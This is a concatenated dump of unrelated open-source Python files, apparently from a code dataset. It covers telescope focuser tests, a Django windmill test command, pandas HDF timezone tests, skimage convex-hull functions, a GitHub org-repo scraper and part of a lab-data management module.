def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
# Expect UID to be a string (or integer?) of non-zero length? Just assert its True
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
focuser.move_to(focuser.min_position - 100)
    assert focuser.position == pytest.approx(focuser.min_position, abs=tolerance)
def test_move_above_max_positions(focuser, tolerance):
    focuser.move_to(focuser.max_position + 100)
    assert focuser.position == pytest.approx(focuser.max_position, abs=tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
# Cameras in the fixture haven't been associated with a Camera yet, this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
    Test focuser init via Camera constructor.
"""
sim_camera = Camera(focuser={'model': 'simulator', 'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
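# Stand-alone illustration (hypothetical FakeA/FakeB classes) of the
# zip(params, ids) fixture trick used above: one module-scoped fixture that
# builds a different object per parametrised id.
class FakeA:
    pass

class FakeB:
    pass

_sketch_params = [FakeA, FakeB]
_sketch_ids = ['a', 'b']

@pytest.fixture(scope='module', params=list(zip(_sketch_params, _sketch_ids)), ids=_sketch_ids)
def sketch_device(request):
    cls, name = request.param
    return cls()

def test_sketch_device(sketch_device):
    assert sketch_device is not None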
|
mit
| -8,882,572,169,062,581,000
| 33.392
| 94
| 0.676902
| false
| 3.66184
| true
| false
| false
|
windmill/windmill
|
windmill/management/commands/test_windmill.py
|
1
|
4314
|
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.management.base import BaseCommand
from windmill.authoring import djangotest
import sys, os
from time import sleep
import types
import logging
class ServerContainer(object):
start_test_server = djangotest.start_test_server
stop_test_server = djangotest.stop_test_server
def attempt_import(name, suffix):
try:
mod = __import__(name+'.'+suffix)
except ImportError:
mod = None
if mod is not None:
s = name.split('.')
mod = __import__(s.pop(0))
for x in s+[suffix]:
mod = getattr(mod, x)
return mod
class Command(BaseCommand):
help = "Run windmill tests. Specify a browser, if one is not passed Firefox will be used"
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
from windmill.conf import global_settings
from windmill.authoring.djangotest import WindmillDjangoUnitTest
if 'ie' in labels:
global_settings.START_IE = True
sys.argv.remove('ie')
elif 'safari' in labels:
global_settings.START_SAFARI = True
sys.argv.remove('safari')
elif 'chrome' in labels:
global_settings.START_CHROME = True
sys.argv.remove('chrome')
else:
global_settings.START_FIREFOX = True
if 'firefox' in labels:
sys.argv.remove('firefox')
if 'manage.py' in sys.argv:
sys.argv.remove('manage.py')
if 'test_windmill' in sys.argv:
sys.argv.remove('test_windmill')
server_container = ServerContainer()
server_container.start_test_server()
global_settings.TEST_URL = 'http://127.0.0.1:%d' % server_container.server_thread.port
# import windmill
# windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
from windmill.authoring import setup_module, teardown_module
from django.conf import settings
tests = []
for name in settings.INSTALLED_APPS:
for suffix in ['tests', 'wmtests', 'windmilltests']:
x = attempt_import(name, suffix)
if x is not None: tests.append((suffix,x,));
wmtests = []
for (ttype, mod,) in tests:
if ttype == 'tests':
for ucls in [getattr(mod, x) for x in dir(mod)
if ( type(getattr(mod, x, None)) in (types.ClassType,
types.TypeType) ) and
issubclass(getattr(mod, x), WindmillDjangoUnitTest)
]:
wmtests.append(ucls.test_dir)
else:
if mod.__file__.endswith('__init__.py') or mod.__file__.endswith('__init__.pyc'):
wmtests.append(os.path.join(*os.path.split(os.path.abspath(mod.__file__))[:-1]))
else:
wmtests.append(os.path.abspath(mod.__file__))
if len(wmtests) is 0:
print 'Sorry, no windmill tests found.'
else:
testtotals = {}
x = logging.getLogger()
x.setLevel(0)
from windmill.dep import functest
bin = functest.bin
runner = functest.runner
runner.CLIRunner.final = classmethod(lambda self, totals: testtotals.update(totals) )
setup_module(tests[0][1])
sys.argv = sys.argv + wmtests
bin.cli()
teardown_module(tests[0][1])
if testtotals['fail'] is not 0:
sleep(.5)
sys.exit(1)
|
apache-2.0
| 8,694,265,997,949,678,000
| 36.513043
| 100
| 0.572323
| false
| 4.046904
| true
| false
| false
|
datapythonista/pandas
|
pandas/tests/io/pytables/test_timezones.py
|
2
|
11495
|
from datetime import (
date,
timedelta,
)
import numpy as np
import pytest
from pandas._libs.tslibs.timezones import maybe_get_tz
import pandas.util._test_decorators as td
import pandas as pd
from pandas import (
DataFrame,
DatetimeIndex,
Series,
Timestamp,
date_range,
)
import pandas._testing as tm
from pandas.tests.io.pytables.common import (
_maybe_remove,
ensure_clean_path,
ensure_clean_store,
)
# TODO(ArrayManager) HDFStore relies on accessing the blocks
pytestmark = td.skip_array_manager_not_yet_implemented
def _compare_with_tz(a, b):
tm.assert_frame_equal(a, b)
# compare the zones on each element
for c in a.columns:
for i in a.index:
a_e = a.loc[i, c]
b_e = b.loc[i, c]
if not (a_e == b_e and a_e.tz == b_e.tz):
raise AssertionError(f"invalid tz comparison [{a_e}] [{b_e}]")
# use maybe_get_tz instead of dateutil.tz.gettz to handle the windows
# filename issues.
gettz_dateutil = lambda x: maybe_get_tz("dateutil/" + x)
gettz_pytz = lambda x: x
@pytest.mark.parametrize("gettz", [gettz_dateutil, gettz_pytz])
def test_append_with_timezones(setup_path, gettz):
# as columns
# Single-tzinfo, no DST transition
df_est = DataFrame(
{
"A": [
Timestamp("20130102 2:00:00", tz=gettz("US/Eastern"))
+ timedelta(hours=1) * i
for i in range(5)
]
}
)
# frame with all columns having same tzinfo, but different sides
# of DST transition
df_crosses_dst = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130603", tz=gettz("US/Eastern")),
},
index=range(5),
)
df_mixed_tz = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130102", tz=gettz("EET")),
},
index=range(5),
)
df_different_tz = DataFrame(
{
"A": Timestamp("20130102", tz=gettz("US/Eastern")),
"B": Timestamp("20130102", tz=gettz("CET")),
},
index=range(5),
)
with ensure_clean_store(setup_path) as store:
_maybe_remove(store, "df_tz")
store.append("df_tz", df_est, data_columns=["A"])
result = store["df_tz"]
_compare_with_tz(result, df_est)
tm.assert_frame_equal(result, df_est)
# select with tz aware
expected = df_est[df_est.A >= df_est.A[3]]
result = store.select("df_tz", where="A>=df_est.A[3]")
_compare_with_tz(result, expected)
# ensure we include dates in DST and STD time here.
_maybe_remove(store, "df_tz")
store.append("df_tz", df_crosses_dst)
result = store["df_tz"]
_compare_with_tz(result, df_crosses_dst)
tm.assert_frame_equal(result, df_crosses_dst)
msg = (
r"invalid info for \[values_block_1\] for \[tz\], "
r"existing_value \[(dateutil/.*)?US/Eastern\] "
r"conflicts with new value \[(dateutil/.*)?EET\]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_tz", df_mixed_tz)
# this is ok
_maybe_remove(store, "df_tz")
store.append("df_tz", df_mixed_tz, data_columns=["A", "B"])
result = store["df_tz"]
_compare_with_tz(result, df_mixed_tz)
tm.assert_frame_equal(result, df_mixed_tz)
# can't append with diff timezone
msg = (
r"invalid info for \[B\] for \[tz\], "
r"existing_value \[(dateutil/.*)?EET\] "
r"conflicts with new value \[(dateutil/.*)?CET\]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_tz", df_different_tz)
@pytest.mark.parametrize("gettz", [gettz_dateutil, gettz_pytz])
def test_append_with_timezones_as_index(setup_path, gettz):
# GH#4098 example
dti = date_range("2000-1-1", periods=3, freq="H", tz=gettz("US/Eastern"))
dti = dti._with_freq(None) # freq doesn't round-trip
df = DataFrame({"A": Series(range(3), index=dti)})
with ensure_clean_store(setup_path) as store:
_maybe_remove(store, "df")
store.put("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
_maybe_remove(store, "df")
store.append("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
def test_roundtrip_tz_aware_index(setup_path):
# GH 17618
time = Timestamp("2000-01-01 01:00:00", tz="US/Eastern")
df = DataFrame(data=[0], index=[time])
with ensure_clean_store(setup_path) as store:
store.put("frame", df, format="fixed")
recons = store["frame"]
tm.assert_frame_equal(recons, df)
assert recons.index[0].value == 946706400000000000
def test_store_index_name_with_tz(setup_path):
# GH 13884
df = DataFrame({"A": [1, 2]})
df.index = DatetimeIndex([1234567890123456787, 1234567890123456788])
df.index = df.index.tz_localize("UTC")
df.index.name = "foo"
with ensure_clean_store(setup_path) as store:
store.put("frame", df, format="table")
recons = store["frame"]
tm.assert_frame_equal(recons, df)
def test_tseries_select_index_column(setup_path):
# GH7777
# selecting a UTC datetimeindex column did
# not preserve UTC tzinfo set before storing
# check that no tz still works
rng = date_range("1/1/2000", "1/30/2000")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == DatetimeIndex(result.values).tz
# check utc
rng = date_range("1/1/2000", "1/30/2000", tz="UTC")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == result.dt.tz
# double check non-utc
rng = date_range("1/1/2000", "1/30/2000", tz="US/Eastern")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store.append("frame", frame)
result = store.select_column("frame", "index")
assert rng.tz == result.dt.tz
def test_timezones_fixed_format_frame_non_empty(setup_path):
with ensure_clean_store(setup_path) as store:
# index
rng = date_range("1/1/2000", "1/30/2000", tz="US/Eastern")
rng = rng._with_freq(None) # freq doesn't round-trip
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
store["df"] = df
result = store["df"]
tm.assert_frame_equal(result, df)
# as data
# GH11411
_maybe_remove(store, "df")
df = DataFrame(
{
"A": rng,
"B": rng.tz_convert("UTC").tz_localize(None),
"C": rng.tz_convert("CET"),
"D": range(len(rng)),
},
index=rng,
)
store["df"] = df
result = store["df"]
tm.assert_frame_equal(result, df)
def test_timezones_fixed_format_empty(setup_path, tz_aware_fixture, frame_or_series):
# GH 20594
dtype = pd.DatetimeTZDtype(tz=tz_aware_fixture)
obj = Series(dtype=dtype, name="A")
if frame_or_series is DataFrame:
obj = obj.to_frame()
with ensure_clean_store(setup_path) as store:
store["obj"] = obj
result = store["obj"]
tm.assert_equal(result, obj)
def test_timezones_fixed_format_series_nonempty(setup_path, tz_aware_fixture):
# GH 20594
dtype = pd.DatetimeTZDtype(tz=tz_aware_fixture)
with ensure_clean_store(setup_path) as store:
s = Series([0], dtype=dtype)
store["s"] = s
result = store["s"]
tm.assert_series_equal(result, s)
def test_fixed_offset_tz(setup_path):
rng = date_range("1/1/2000 00:00:00-07:00", "1/30/2000 00:00:00-07:00")
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(setup_path) as store:
store["frame"] = frame
recons = store["frame"]
tm.assert_index_equal(recons.index, rng)
assert rng.tz == recons.index.tz
@td.skip_if_windows
def test_store_timezone(setup_path):
# GH2852
# issue storing datetime.date with a timezone as it resets when read
# back in a new timezone
# original method
with ensure_clean_store(setup_path) as store:
today = date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store["obj1"] = df
result = store["obj1"]
tm.assert_frame_equal(result, df)
# with tz setting
with ensure_clean_store(setup_path) as store:
with tm.set_timezone("EST5EDT"):
today = date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store["obj1"] = df
with tm.set_timezone("CST6CDT"):
result = store["obj1"]
tm.assert_frame_equal(result, df)
def test_legacy_datetimetz_object(datapath, setup_path):
# legacy from < 0.17.0
# 8260
expected = DataFrame(
{
"A": Timestamp("20130102", tz="US/Eastern"),
"B": Timestamp("20130603", tz="CET"),
},
index=range(5),
)
with ensure_clean_store(
datapath("io", "data", "legacy_hdf", "datetimetz_object.h5"), mode="r"
) as store:
result = store["df"]
tm.assert_frame_equal(result, expected)
def test_dst_transitions(setup_path):
# make sure we are not failing on transitions
with ensure_clean_store(setup_path) as store:
times = date_range(
"2013-10-26 23:00",
"2013-10-27 01:00",
tz="Europe/London",
freq="H",
ambiguous="infer",
)
times = times._with_freq(None) # freq doesn't round-trip
for i in [times, times + pd.Timedelta("10min")]:
_maybe_remove(store, "df")
df = DataFrame({"A": range(len(i)), "B": i}, index=i)
store.append("df", df)
result = store.select("df")
tm.assert_frame_equal(result, df)
def test_read_with_where_tz_aware_index(setup_path):
# GH 11926
periods = 10
dts = date_range("20151201", periods=periods, freq="D", tz="UTC")
mi = pd.MultiIndex.from_arrays([dts, range(periods)], names=["DATE", "NO"])
expected = DataFrame({"MYCOL": 0}, index=mi)
key = "mykey"
with ensure_clean_path(setup_path) as path:
with pd.HDFStore(path) as store:
store.append(key, expected, format="table", append=True)
result = pd.read_hdf(path, key, where="DATE > 20151130")
tm.assert_frame_equal(result, expected)
def test_py2_created_with_datetimez(datapath, setup_path):
# The test HDF5 file was created in Python 2, but could not be read in
# Python 3.
#
# GH26443
index = [Timestamp("2019-01-01T18:00").tz_localize("America/New_York")]
expected = DataFrame({"data": 123}, index=index)
with ensure_clean_store(
datapath("io", "data", "legacy_hdf", "gh26443.h5"), mode="r"
) as store:
result = store["key"]
tm.assert_frame_equal(result, expected)
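# Minimal round-trip sketch (file name and data are made up; requires the
# optional PyTables dependency) of the behaviour exercised above: a tz-aware
# DatetimeIndex survives a put/select cycle in table format.
def roundtrip_sketch(path="example.h5"):
    idx = date_range("2021-01-01", periods=3, freq="H", tz="US/Eastern")
    idx = idx._with_freq(None)  # freq doesn't round-trip
    df = DataFrame({"A": range(3)}, index=idx)
    with pd.HDFStore(path, mode="w") as store:
        store.put("df", df, format="table")
        result = store.select("df")
    tm.assert_frame_equal(result, df)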
|
bsd-3-clause
| -4,588,879,910,586,167,000
| 29.817694
| 85
| 0.582427
| false
| 3.333817
| true
| false
| false
|
WarrenWeckesser/scikits-image
|
skimage/morphology/convex_hull.py
|
2
|
3703
|
__all__ = ['convex_hull_image', 'convex_hull_object']
import numpy as np
from ..measure._pnpoly import grid_points_in_poly
from ._convex_hull import possible_hull
from ..measure._label import label
from ..util import unique_rows
try:
from scipy.spatial import Delaunay
except ImportError:
Delaunay = None
def convex_hull_image(image):
"""Compute the convex hull image of a binary image.
The convex hull is the set of pixels included in the smallest convex
polygon that surround all white pixels in the input image.
Parameters
----------
image : (M, N) array
Binary input image. This array is cast to bool before processing.
Returns
-------
hull : (M, N) array of bool
Binary image with pixels in convex hull set to True.
References
----------
.. [1] http://blogs.mathworks.com/steve/2011/10/04/binary-image-convex-hull-algorithm-notes/
"""
if Delaunay is None:
raise ImportError("Could not import scipy.spatial.Delaunay, "
"only available in scipy >= 0.9.")
# Here we do an optimisation by choosing only pixels that are
# the starting or ending pixel of a row or column. This vastly
# limits the number of coordinates to examine for the virtual hull.
coords = possible_hull(image.astype(np.uint8))
N = len(coords)
# Add a vertex for the middle of each pixel edge
coords_corners = np.empty((N * 4, 2))
for i, (x_offset, y_offset) in enumerate(zip((0, 0, -0.5, 0.5),
(-0.5, 0.5, 0, 0))):
coords_corners[i * N:(i + 1) * N] = coords + [x_offset, y_offset]
# repeated coordinates can *sometimes* cause problems in
# scipy.spatial.Delaunay, so we remove them.
coords = unique_rows(coords_corners)
# Subtract offset
offset = coords.mean(axis=0)
coords -= offset
# Find the convex hull
chull = Delaunay(coords).convex_hull
v = coords[np.unique(chull)]
# Sort vertices clock-wise
v_centred = v - v.mean(axis=0)
angles = np.arctan2(v_centred[:, 0], v_centred[:, 1])
v = v[np.argsort(angles)]
# Add back offset
v += offset
# For each pixel coordinate, check whether that pixel
# lies inside the convex hull
mask = grid_points_in_poly(image.shape[:2], v)
return mask
def convex_hull_object(image, neighbors=8):
"""Compute the convex hull image of individual objects in a binary image.
The convex hull is the set of pixels included in the smallest convex
polygon that surround all white pixels in the input image.
Parameters
----------
image : ndarray
Binary input image.
neighbors : {4, 8}, int
Whether to use 4- or 8-connectivity.
Returns
-------
hull : ndarray of bool
Binary image with pixels in convex hull set to True.
Notes
-----
This function uses skimage.morphology.label to define unique objects,
finds the convex hull of each using convex_hull_image, and combines
these regions with logical OR. Be aware the convex hulls of unconnected
objects may overlap in the result. If this is suspected, consider using
convex_hull_image separately on each object.
"""
if neighbors != 4 and neighbors != 8:
raise ValueError('Neighbors must be either 4 or 8.')
labeled_im = label(image, neighbors, background=0)
convex_obj = np.zeros(image.shape, dtype=bool)
convex_img = np.zeros(image.shape, dtype=bool)
for i in range(0, labeled_im.max() + 1):
convex_obj = convex_hull_image(labeled_im == i)
convex_img = np.logical_or(convex_img, convex_obj)
return convex_img
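# Usage sketch (synthetic input, not part of the module): the convex hull of
# three isolated pixels is the filled triangle spanned by them.
if __name__ == '__main__':
    img = np.zeros((7, 7), dtype=bool)
    img[1, 1] = img[1, 5] = img[5, 3] = True
    print(convex_hull_image(img).astype(int))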
|
bsd-3-clause
| 7,252,472,451,150,757,000
| 30.117647
| 96
| 0.644883
| false
| 3.623288
| false
| false
| false
|
evancasey/startup-finder
|
lib/github_dump.py
|
1
|
1658
|
import urllib
import urllib2
import json
import pdb
import sys
import time
import csv
import tokens
from models import *
class GithubListener:
def get_all_repos(self,org):
url = "https://api.github.com/orgs/" + org + "/repos?client_id=" + tokens.GITHUB_ID + "&client_secret=" + tokens.GITHUB_SECRET
try:
resource = urllib2.urlopen(url)
pages = json.loads(resource.read())
return pages
except:
print("path not found")
pass
def get_all_orgs_csv(self):
orgs = []
f = open('all_orgs.txt', 'rt')
reader = csv.reader(f)
for row in reader:
orgs += row
return orgs
if __name__ == "__main__":
gl = GithubListener()
orgs = gl.get_all_orgs_csv()
counter = 0
for org in orgs[100:]:
repos = gl.get_all_repos(org)
if repos:
for repo in repos:
print(json.dumps(repo,indent=2))
counter +=1
try:
github_data = Github(id = str(counter),
organization = org,
repos = json.dumps(repos))
Session.add(github_data)
print "Committing.."
Session.commit()
except Exception, e:
print >> sys.stderr, 'Encountered Exception: ', e
pass
|
mit
| -1,315,194,730,258,532,000
| 20.269231
| 142
| 0.431242
| false
| 4.657303
| false
| false
| false
|
reed-college/lemur
|
lemur/utility_modify.py
|
1
|
23527
|
# Libraries
# Local
from lemur import models as m
from lemur import (app, db)
from lemur.utility_generate_and_convert import (check_existence,
generate_lab_id,
generate_experiment_id,
generate_observation_id,
generate_class_id,
generate_user_name,
decompose_lab_id,
tranlate_term_code_to_semester,
cleanup_class_data)
from lemur.utility_find_and_get import (lab_exists,
experiment_exists,
class_exists,
observation_exists,
user_exists,
get_lab,
get_observation,
get_user,
get_class,
get_role,
get_all_class,
get_all_user,
get_experiments_for_lab,
get_observations_for_experiment,
find_lab_copy_id)
ds = db.session
# --- Manage labs ---
# Delete a lab's basic info, experiments info and observations info
def delete_lab(lab_id):
ds.delete(get_lab(lab_id))
experiments_query = get_experiments_for_lab(lab_id)
for e in experiments_query:
ds.delete(e)
ds.commit()
# Modify a lab
def modify_lab(lab_json):
the_class = None
class_users = []
experiments_for_lab = []
lab_status = 'Unactivated'
lab_id = None
err_msg = check_existence(lab_json, 'labName', 'classId', 'labDescription',
'experiments', 'oldLabId')
if lab_exists(lab_json['oldLabId']):
lab_status = get_lab(lab_json['oldLabId']).status
delete_lab(lab_json['oldLabId'])
if not class_exists(lab_json['classId']):
        err_msg += 'class id: {0} doesn\'t exist in the database'.format(lab_json['classId'])
if err_msg != '':
return err_msg
the_class = get_class(lab_json['classId'])
# Build connection between the current lab and the existing users/class
if the_class is not None:
class_users = the_class.users
lab_id = generate_lab_id(lab_json['labName'], lab_json['classId'])
if lab_exists(lab_id):
return 'lab id:{0} already exists'.format(lab_id)
for e in lab_json['experiments']:
err_msg = check_existence(e, 'name', 'description', 'order',
'valueType', 'valueRange',
'valueCandidates')
if err_msg != '':
return err_msg
for e in lab_json['experiments']:
experiment_name = e['name']
        # Check if the experiment name already repeats among all the
# experiments to be added into the current lab
for i in range(len(lab_json['experiments'])):
if [exp['name'] for exp in lab_json['experiments']].count(experiment_name) > 1:
lab_json['experiments'] = (lab_json['experiments'][0:i] +
lab_json['experiments'][i+1:len(lab_json['experiments'])])
                warning_msg = 'repeated experiment name:{} in this lab'.format(experiment_name)
app.logger.warning(warning_msg)
continue
experiment_id = generate_experiment_id(lab_id, experiment_name)
if experiment_exists(experiment_id):
warning_msg = 'The same experiment name has already exist in the same lab'
app.logger.warning(warning_msg)
continue
else:
experiments_for_lab.append(m.Experiment(lab_id=lab_id,
id=experiment_id,
name=experiment_name,
description=e['description'],
order=e['order'],
value_type=e['valueType'],
value_range=e['valueRange'],
value_candidates=e['valueCandidates']))
the_lab = m.Lab(id=lab_id, name=lab_json['labName'],
description=lab_json['labDescription'],
status=lab_status,
the_class=the_class,
experiments=experiments_for_lab,
users=class_users)
ds.add(the_lab)
ds.commit()
return ''
# copy a old lab and rename the new lab with 'copy'+index+'-'+old_lab_name
def duplicate_lab(old_lab_id):
# Find a new lab id according to the old lab id
new_lab_id = find_lab_copy_id(old_lab_id)
# Copy info from old lab and add to new lab
old_lab = get_lab(old_lab_id)
# A lab can only belong to one class at this point
old_class = get_class(old_lab.the_class.id)
new_lab = m.Lab(id=new_lab_id,
name=decompose_lab_id(new_lab_id)['lab_name'],
description=old_lab.description, status=old_lab.status,
the_class=old_class, users=old_class.users)
new_experiments = []
for e in old_lab.experiments:
experiment_name = e.name
new_experiment_id = generate_experiment_id(new_lab_id,
experiment_name)
new_experiment = m.Experiment(lab_id=new_lab_id,
id=new_experiment_id,
name=experiment_name,
description=e.description,
order=e.order,
value_type=e.value_type,
value_range=e.value_range,
value_candidates=e.value_candidates)
new_experiments.append(new_experiment)
new_lab.experiments = new_experiments
ds.add(new_lab)
ds.commit()
# Change a lab's status
def change_lab_status(lab_id, new_status):
lab_query = get_lab(lab_id)
lab_query.status = new_status
# Automatically delete all the data in the lab if it's made unavailable
if new_status == "Unactivated":
experiments_query = get_experiments_for_lab(lab_query.id)
for e in experiments_query:
for d in get_observations_for_experiment(e.id):
ds.delete(d)
ds.commit()
# --- Manage observations ---
# delete observation from a list of observation ids sent from client
def delete_observation(old_observation_ids_list):
err_msg = ''
# delete all the old data by old observation_id
for observation_id in old_observation_ids_list:
observations_query = get_observation(observation_id)
# Check the existence of the observation to be deleted
if observation_exists(observation_id):
ds.delete(observations_query)
# err_msg += ('To be deleted observation:' +
# '{} doesn\'t exits in db\n'.format(observations_query))
ds.commit()
return err_msg
# add observation from a list JSON format observations sent from client
# This function is invoked when admin edits data of a lab
def add_observation(new_observations_list):
warning_msg = ''
for d in new_observations_list:
err_msg = check_existence(d, 'studentName', 'observationData',
'experimentId', 'observationId')
if err_msg != '':
return err_msg
for d in new_observations_list:
        # Check if the observation name already repeats among all the
# observations to be added into the database and rename it if necessary
index = 1
tmp_student_name = d['studentName']
tmp_observation_id = d['observationId']
while observation_exists(tmp_observation_id):
tmp_student_name = d['studentName'] + '('+str(index)+')'
tmp_observation_id = generate_observation_id(d['experimentId'], tmp_student_name)
index += 1
# warning_msg = ('repeated observation id:{} in this lab so the ' +
# 'current, modified entry will be renamed to ' +
# '{}'.format(d['observationId'], tmp_observation_id))
# Capitalize every input
ds.add(m.Observation(experiment_id=d['experimentId'],
id=tmp_observation_id,
student_name=tmp_student_name,
datum=d['observationData'].upper()))
ds.commit()
return warning_msg
# add observations sent by students into the database
# This function is invoked when a student send a group of data
def add_observations_sent_by_students(observations_group_by_student):
# the data type of observations should be a list
if not(isinstance(observations_group_by_student, list)):
err_msg = 'The value of the key observations should be a list'
return err_msg
# check that all list elements have the right format
for student in observations_group_by_student:
err_msg = check_existence(student, 'studentName',
'observationsForOneExperiment')
if err_msg != '':
return err_msg
for ob in student['observationsForOneExperiment']:
err_msg = check_existence(ob, 'labId', 'experimentName',
'observation')
if err_msg != '':
return err_msg
# If everything is correct add the data to the database
experiment_id = generate_experiment_id(ob['labId'], ob['experimentName'])
# To avoid repetition in student name field since it's used as part
            # of key for an input we add a unique index at the end of
# each student name
tmp_student_name = student['studentName']+'(1)'
observation_id = generate_observation_id(experiment_id,
tmp_student_name)
index = 2
while observation_exists(observation_id):
tmp_student_name = student['studentName'] + '('+str(index)+')'
observation_id = generate_observation_id(experiment_id,
tmp_student_name)
index += 1
# Capitalize every input
if not observation_exists(observation_id):
ds.add(m.Observation(experiment_id=experiment_id,
id=observation_id,
student_name=tmp_student_name,
datum=ob['observation'].upper()))
ds.commit()
return ''
# --- Manage admins ---
# add an admin into the database according to admin_info
def add_user(user_info):
# Get role object from table
user_role = get_role(user_info['role'])
# id of the Admin must be unique before user can be created
err_msg = check_existence(user_info, 'username', 'role')
if err_msg != '':
return err_msg
classes = []
labs = []
if user_info['role'] == 'Student':
for class_id in user_info.getlist('classIds'):
if class_exists(class_id):
the_class = get_class(class_id)
classes.append(the_class)
for lab in the_class.labs:
labs.append(lab)
else:
return 'the class with id:{} doesn\'t exist.'.format(class_id)
if not user_exists(user_info['username']):
name = None
if 'name' in user_info:
name = user_info['name']
new_user = m.User(id=user_info['username'],
name=name,
role=user_role,
classes=classes,
labs=labs)
ds.add(new_user)
ds.commit()
else:
err_msg = 'The username:{} already exists'.format(user_info['username'])
return err_msg
# change the user's info(including role and classes)
def change_user_info(username, role, class_ids):
user = get_user(username)
classes = []
labs = []
if class_ids:
for c in class_ids:
the_class = get_class(c)
classes.append(the_class)
for lab in the_class.labs:
labs.append(lab)
user.role = get_role(role)
user.classes = classes
user.labs = labs
ds.commit()
# delete an admin from the database
def delete_user(username):
user_to_be_removed = get_user(username)
ds.delete(user_to_be_removed)
ds.commit()
# add a class into the database according to class_info
def add_class(class_info):
# Check the correctness of data format
# Note: students is optional i.e. it can be undefined
err_msg = check_existence(class_info, 'className', 'classTime')
if err_msg != '':
return err_msg
users = []
usernames = []
# create new class with data sent by client to be added to database
new_class_id = generate_class_id(
class_info['className'], class_info['classTime'])
if not class_exists(new_class_id):
if 'professors' in class_info:
for p in class_info.getlist('professors'):
if not user_exists(p):
err_msg = 'The professor with id:{} doesn\'t exist.'.format(p)
return err_msg
else:
usernames.append(p)
if 'students' in class_info:
for s in class_info.getlist('students'):
if not user_exists(s):
                    err_msg = 'The student with id:{} doesn\'t exist.'.format(s)
return err_msg
elif get_user(s).role_name != 'Student':
                    err_msg = s+(' already exists and is not a student. '
'You should not put their name into student name')
return err_msg
else:
usernames.append(s)
for username in usernames:
users.append(get_user(username))
new_class = m.Class(id=new_class_id,
name=class_info['className'],
time=class_info['classTime'],
users=users)
ds.add(new_class)
ds.commit()
else:
err_msg = "The class id already exists: {}".format(get_class(new_class_id))
return err_msg
# ---Manage classes---
# remove a class from the database according to class_id
def delete_class(class_id):
class_to_be_removed = get_class(class_id)
# discard users not enrolled in any other class with labs
# discard labs associated with the class to be deleted
for s in class_to_be_removed.users:
if s.role_name == 'Student' and len(s.classes) == 1:
ds.delete(s)
for l in class_to_be_removed.labs:
if lab_exists(l.id):
ds.delete(get_lab(l.id))
ds.delete(class_to_be_removed)
ds.commit()
# Change the users(both professors and students) in a class
def change_class_users(class_id, new_users):
if not class_exists(class_id):
return 'Class with id: {} doesn\'t exist'.format(class_id)
the_class = get_class(class_id)
old_users = the_class.users
# Add new users to the class;
# add the associated labs to these users lab list
for u in new_users:
if not user_exists(str(u)):
ds.rollback()
return 'User with username: {} doesn\'t exist'.format(u)
else:
user = get_user(u)
if not (u in the_class.users):
the_class.users.append(user)
user.labs = the_class.labs
# Delete the class and the associated labs from old users who
# are not in the class anymore
for u in old_users:
if not(u.id in str(new_users)):
u.classes = [c for c in u.classes if c.id != class_id]
new_lab_list = []
for lab in u.labs:
if lab.the_class.id != class_id:
new_lab_list.append(lab)
u.labs = new_lab_list
ds.commit()
return ''
# --- Initialize Classes and Users by getting data from Iris ---
# Populate the database with classes and their corresponding professors
# Note: This needs to be invoked before update_users_by_data_from_iris
# The existing professors will not be deleted even if they don't teach
# any class
def populate_db_with_classes_and_professors(class_data):
class_data = cleanup_class_data(class_data)
for c in class_data:
class_name = c['subject'] + c['course_number']
class_time = tranlate_term_code_to_semester(c['term_code'])
class_professor_info_list = c['instructors']
class_professor_ids = [p['username'] for p in class_professor_info_list]
class_professors = []
for p in class_professor_info_list:
